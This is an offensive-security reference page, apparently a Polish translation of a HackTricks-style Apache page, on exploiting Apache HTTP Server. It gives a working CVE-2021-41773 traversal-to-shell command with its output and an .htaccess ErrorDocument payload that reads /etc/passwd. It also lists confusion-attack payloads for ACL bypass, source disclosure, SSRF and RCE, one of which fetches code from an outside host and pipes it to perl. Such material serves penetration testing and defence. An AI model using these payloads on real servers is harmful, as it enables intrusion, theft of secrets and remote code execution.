Apache

Reading time: 12 minutes

Wykonywalne rozszerzenia PHP

Sprawdź, które rozszerzenia są ładowane przez serwer Apache. Aby je wyszukać, możesz wykonać:

grep -R -B1 "httpd-php" /etc/apache2

Ponadto, niektóre miejsca, w których możesz znaleźć tę konfigurację to:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

LFI via .htaccess ErrorDocument file provider (ap_expr)

Jeśli możesz kontrolować .htaccess katalogu i AllowOverride dla tej ścieżki zawiera FileInfo, możesz zamienić odpowiedzi 404 w dowolne odczyty lokalnych plików, używając funkcji ap_expr file() wewnątrz ErrorDocument.

• Wymagania:
• Apache 2.4 z włączonym parserem wyrażeń (ap_expr) (domyślnie w 2.4).
• vhost/dir musi umożliwiać .htaccess ustawienie ErrorDocument (AllowOverride FileInfo).
• Użytkownik workera Apache musi mieć uprawnienia do odczytu docelowego pliku.

.htaccess payload:

# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}

Wywołaj, wysyłając żądanie do dowolnej nieistniejącej ścieżki w tym katalogu, na przykład przy nadużyciu userdir-style hosting:

curl -s http://target/~user/does-not-exist | sed -n '1,20p'

Notes and tips:

• Działają tylko ścieżki bezwzględne. Zawartość jest zwracana jako body odpowiedzi dla handlera 404.
• Efektywne uprawnienia do odczytu są takie, jak użytkownika Apache (zazwyczaj www-data/apache). Nie będziesz mógł odczytać /root/* ani /etc/shadow w domyślnych konfiguracjach.
• Nawet jeśli .htaccess jest własnością root, jeśli katalog nadrzędny należy do tenant-a i pozwala na rename, możesz być w stanie zmienić nazwę oryginalnego .htaccess i wgrać własne zastąpienie przez SFTP/FTP:
• rename .htaccess .htaccess.bk
• put your malicious .htaccess
• Użyj tego, aby czytać kod aplikacji pod DocumentRoot lub w ścieżkach konfiguracji vhost i zebrać sekrety (DB creds, API keys, etc.).

Confusion Attack

These types of attacks has been introduced and documented by Orange in this blog post and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.

Filename Confusion

Truncation

The mod_rewrite will trim the content of r->filename after the character ? (modules/mappers/mod_rewrite.c#L4141). This isn't totally wrong as most modules will treat r->filename as an URL. Bur in other occasions this will be treated as file path, which would cause a problem.

• Path Truncation

It's possible to abuse mod_rewrite like in the following rule example to access other files inside the file system, removing the last part of the expected path adding simply a ?:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`

# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`

• Mislead RewriteFlag Assignment

W poniższej regule przepisywania, dopóki URL kończy się na .php, będzie on traktowany i wykonywany jako php. Dlatego możliwe jest przesłanie URL, który kończy się na .php po znaku ?, podczas gdy w ścieżce ładowany jest inny typ pliku (np. obraz) zawierający złośliwy kod php wewnątrz niego:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>

# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

ACL Bypass

Możliwe jest uzyskanie dostępu do plików, do których użytkownik nie powinien mieć dostępu, nawet jeśli dostęp powinien być zablokowany przez konfiguracje takie jak:

<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>

Jest tak, ponieważ domyślnie PHP-FPM otrzyma URL-e kończące się na .php, jak http://server/admin.php%3Fooo.php, i ponieważ PHP-FPM usunie wszystko po znaku ?, poprzedni URL pozwoli na załadowanie /admin.php, nawet jeśli wcześniejsza reguła tego zabraniała.

Nieporozumienie wokół DocumentRoot

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

Ciekawostka o Apache: poprzedni rewrite spróbuje uzyskać dostęp do pliku zarówno z documentRoot, jak i z root. Zatem żądanie do https://server/abouth.html sprawdzi obecność pliku w /var/www/html/about.html oraz w /about.html w systemie plików. To w praktyce można wykorzystać do uzyskania dostępu do plików w systemie plików.

Ujawnienie kodu źródłowego po stronie serwera

• Ujawnij kod źródłowy CGI

Wystarczy dodanie %3F na końcu, aby spowodować leak kodu źródłowego modułu CGI:

curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi

• Ujawnij PHP Source Code

Jeśli serwer ma różne domeny, z których jedna jest domeną statyczną, można to wykorzystać do przeszukiwania systemu plików i leak php code:

# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php

Local Gadgets Manipulation

Głównym problemem poprzedniego ataku jest to, że domyślnie większość dostępu do systemu plików będzie odmówiona, jak w Apache HTTP Server’s configuration template:

<Directory />
AllowOverride None
Require all denied
</Directory>

Jednak systemy Debian/Ubuntu domyślnie zezwalają na /usr/share:

<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>

Dlatego możliwe byłoby wykorzystanie plików znajdujących się w /usr/share w tych dystrybucjach.

Lokalny gadget do ujawnienia informacji

• Apache HTTP Server z websocketd może ujawniać skrypt dump-env.php w /usr/share/doc/websocketd/examples/php/, który może leak wrażliwe zmienne środowiskowe.
• Serwery z Nginx lub Jetty mogą ujawniać wrażliwe informacje aplikacji webowej (np. web.xml) przez swoje domyślne web rooty umieszczone pod /usr/share:
• /usr/share/nginx/html/
• /usr/share/jetty9/etc/
• /usr/share/jetty9/webapps/

Lokalny gadget do XSS

• Na Ubuntu Desktop z zainstalowanym LibreOffice, wykorzystanie funkcji przełączania języka w plikach pomocy może prowadzić do Cross-Site Scripting (XSS). Manipulacja URL-em w /usr/share/libreoffice/help/help.html może przekierować na złośliwe strony lub starsze wersje przez niebezpieczne RewriteRule.

Lokalny gadget do LFI

• Jeśli PHP lub pewne pakiety front-endowe, takie jak JpGraph czy jQuery-jFeed, są zainstalowane, ich pliki mogą zostać wykorzystane do odczytu wrażliwych plików, takich jak /etc/passwd:
• /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
• /usr/share/javascript/jquery-jfeed/proxy.php
• /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Lokalny gadget do SSRF

• Wykorzystanie MagpieRSS i pliku magpie_debug.php w /usr/share/php/magpierss/scripts/magpie_debug.php może łatwo stworzyć lukę SSRF, otwierając drogę do dalszych exploitów.

Lokalny gadget do RCE

• Możliwości Remote Code Execution (RCE) są rozległe — podatne instalacje, takie jak przestarzałe PHPUnit czy phpLiteAdmin, mogą zostać wykorzystane do wykonania dowolnego kodu, co pokazuje szeroki potencjał manipulacji lokalnymi gadgetami.

Jailbreak z lokalnych gadgetów

Możliwe jest także wykonanie jailbreaku z dozwolonych folderów przez śledzenie symlinków generowanych przez zainstalowane oprogramowanie w tych folderach, takich jak:

• Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
• Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
• Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
• MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
• SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Co więcej, przez nadużycie symlinków możliwe było uzyskanie RCE in Redmine.

Zamieszanie handlerów

Ten atak wykorzystuje nakładanie się funkcjonalności między dyrektywami AddHandler i AddType, które obie mogą być użyte do włączenia przetwarzania PHP. Początkowo dyrektywy te wpływały na różne pola (r->handler i r->content_type odpowiednio) w wewnętrznej strukturze serwera. Jednak z powodu legacy code, Apache obsługuje te dyrektywy zamiennie w określonych warunkach, konwertując r->content_type na r->handler jeśli pierwsze jest ustawione, a drugie nie.

Co więcej, w Apache HTTP Server (server/config.c#L420), jeśli r->handler jest pusty przed wykonaniem ap_run_handler(), serwer używa r->content_type jako handlera, efektywnie czyniąc AddType i AddHandler identycznymi pod względem działania.

Nadpisanie handlera w celu ujawnienia kodu źródłowego PHP

W tę prezentację zaprezentowano podatność, w której niepoprawny Content-Length wysłany przez klienta może spowodować, że Apache błędnie zwróci kod źródłowy PHP. Wynikało to z problemu z obsługą błędów w ModSecurity i Apache Portable Runtime (APR), gdzie podwójna odpowiedź prowadzi do nadpisania r->content_type na text/html.
Ponieważ ModSecurity nie obsługuje prawidłowo wartości zwracanych, zwróciłby kod PHP i nie zinterpretowałby go.

Overwrite Handler to XXXX

TODO: Orange jeszcze nie ujawnił tej podatności

Wywoływanie dowolnych handlerów

Jeśli atakujący jest w stanie kontrolować nagłówek Content-Type w odpowiedzi serwera, będzie mógł wywołać dowolne modułowe handlery. Jednak w momencie, gdy atakujący to kontroluje, większość procesu żądania będzie już wykonana. Możliwe jest jednak ponowne uruchomienie procesu żądania wykorzystując nagłówek Location, ponieważ jeśli zwrócony Status jest 200 i nagłówek Location zaczyna się od /, odpowiedź jest traktowana jako Server-Side Redirection i powinna być przetworzona

Zgodnie z RFC 3875 (specyfikacja dotycząca CGI) w Section 6.2.2 definiuje zachowanie Local Redirect Response:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Dlatego, aby przeprowadzić ten atak, potrzebna jest jedna z następujących podatności:

• CRLF Injection w nagłówkach odpowiedzi CGI
• SSRF z pełną kontrolą nagłówków odpowiedzi

Dowolny handler prowadzący do ujawnienia informacji

Na przykład /server-status powinien być dostępny tylko lokalnie:

<Location /server-status>
SetHandler server-status
Require local
</Location>

Można uzyskać do niego dostęp, ustawiając nagłówek Content-Type na server-status oraz nagłówek Location zaczynający się od /.

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

Arbitrary Handler to Full SSRF

Przekierowanie do mod_proxy, aby uzyskać dostęp do dowolnego protokołu pod dowolnym URL:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a

Jednak nagłówek X-Forwarded-For jest dodawany, co uniemożliwia dostęp do endpointów metadanych chmury.

Arbitrary Handler to Access Local Unix Domain Socket

Uzyskaj dostęp do lokalnego Unix Domain Socket PHP-FPM, aby uruchomić PHP backdoor znajdujący się w /tmp/:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Arbitrary Handler to RCE

Oficjalny obraz PHP Docker zawiera PEAR (Pearcmd.php), narzędzie do zarządzania pakietami PHP z linii poleceń, które można wykorzystać do uzyskania RCE:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Sprawdź Docker PHP LFI Summary, autorstwa Phith0n, aby uzyskać szczegóły tej techniki.

Źródła

• https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1
• Apache 2.4 Custom Error Responses (ErrorDocument)
• Apache 2.4 Expressions and functions (file:)
• HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse